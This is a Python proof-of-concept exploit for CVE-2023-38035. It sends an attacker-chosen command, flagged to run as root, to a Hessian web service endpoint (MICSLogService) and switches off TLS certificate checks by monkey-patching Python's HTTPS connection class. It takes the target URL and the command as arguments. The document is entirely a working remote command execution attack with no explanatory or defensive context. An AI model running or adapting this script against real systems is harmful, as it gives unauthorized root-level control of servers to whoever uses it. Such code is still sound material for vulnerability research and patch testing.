CVE-2023-38035.py

from pyhessian.client import HessianProxy
from http.client import HTTPSConnection
import ssl
import sys
import argparse
import requests
import urllib3
urllib3.disable_warnings()


# Backup original constructor
_original_https_init = HTTPSConnection.__init__

def patched_https_init(self, *args, **kwargs):
    # If context is not provided, use unverified context
    if 'context' not in kwargs:
        kwargs['context'] = ssl._create_unverified_context()
    _original_https_init(self, *args, **kwargs)


def exploit(base_url, command):
    # Define the Hessian service endpoint
    service_url = f"{base_url}/mics/services/MICSLogService"
    
    r = requests.get(service_url, verify=False)
    if r.status_code != 405:
        print('[-] Vulnerable endpoint was not reachable - bailing')
        sys.exit()

    # Monkey-patch the constructor
    HTTPSConnection.__init__ = patched_https_init
    
    dto = {
        "command": command,
        "isRoot": True,
    }
    
    # Create a Hessian proxy for the service
    proxy = HessianProxy(service_url)
    
    # Call a method on the Hessian service:
    details = proxy.uploadFileUsingFileInput(dto, None)
    if details:
        print('[+] Successfully executed command on target!')

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', '--url', help='The URL of the target', required=True)
    parser.add_argument('-c', '--cmd', help='The command to run', required=True)
    args = parser.parse_args()

    exploit(args.url, args.cmd)